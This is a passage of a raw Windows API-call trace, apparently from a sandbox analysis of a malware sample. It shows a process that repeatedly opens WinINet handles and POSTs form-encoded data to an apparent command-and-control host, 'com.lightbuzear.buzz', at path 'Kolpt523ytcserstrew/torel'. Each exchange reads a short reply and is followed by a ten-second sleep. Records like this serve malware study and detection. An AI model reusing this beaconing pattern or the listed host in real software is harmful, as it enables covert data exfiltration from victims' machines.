hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830958 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830548 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0236.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0236.646] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0236.646] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0236.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0236.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0236.646] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0236.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815980 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815980 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830548 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0236.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307a0 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0236.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307c8 [0236.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0236.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0236.648] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0236.648] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0237.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307c8 | out: hHeap=0x4780000) returned 1 [0237.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0237.759] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0237.760] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0237.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0237.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0237.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0237.760] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0237.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0237.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0237.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0237.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0237.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0237.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ad0 [0237.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0237.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815998 [0237.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0237.761] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0237.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815998 | out: hHeap=0x4780000) returned 1 [0237.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830610 [0237.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0237.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0237.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830610 | out: hHeap=0x4780000) returned 1 [0237.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830610 [0237.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0237.762] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0237.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0237.763] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0237.763] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0237.763] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0237.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0237.764] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0237.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0237.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a10 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815908 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a10 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815908 | out: hHeap=0x4780000) returned 1 [0237.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830700 [0237.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0237.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830700 | out: hHeap=0x4780000) returned 1 [0237.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830818 [0237.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0237.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0237.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0237.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0237.767] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0237.767] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0237.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0237.767] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0237.767] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0237.767] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0237.767] FreeLibrary (hLibModule=0x71570000) returned 1 [0237.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0237.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0237.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48305e8 | out: hHeap=0x4780000) returned 1 [0237.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48304a8 | out: hHeap=0x4780000) returned 1 [0237.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0237.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0237.769] Sleep (dwMilliseconds=0x2710) [0237.798] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0237.798] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0237.799] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815560 [0237.799] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0237.800] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0237.800] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0237.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0237.800] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0237.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0237.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0237.800] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0237.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0237.800] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0237.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48306b0 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0237.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830638 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0237.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0237.802] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0237.802] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0237.802] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0237.802] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0237.803] FreeLibrary (hLibModule=0x71780000) returned 1 [0237.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0237.803] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0237.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0237.803] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0237.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0237.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0237.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0237.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48158c0 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158c0 | out: hHeap=0x4780000) returned 1 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815800 [0237.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0237.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0237.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0237.805] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0237.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0237.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0237.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0237.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0237.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815998 [0237.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0237.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815968 [0237.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815998 | out: hHeap=0x4780000) returned 1 [0237.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0237.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0237.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815890 [0237.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830778 [0237.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830778 | out: hHeap=0x4780000) returned 1 [0237.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0237.807] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0237.807] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0237.807] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0237.807] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0237.807] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48158c0 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a58 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48158c0 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a58 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48304a8 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0238.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48304a8 | out: hHeap=0x4780000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830660 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0238.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308b8 [0238.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0238.036] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0238.037] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0238.037] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0238.037] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308b8 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ab8 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815818 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ab8 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815818 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48304a8 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 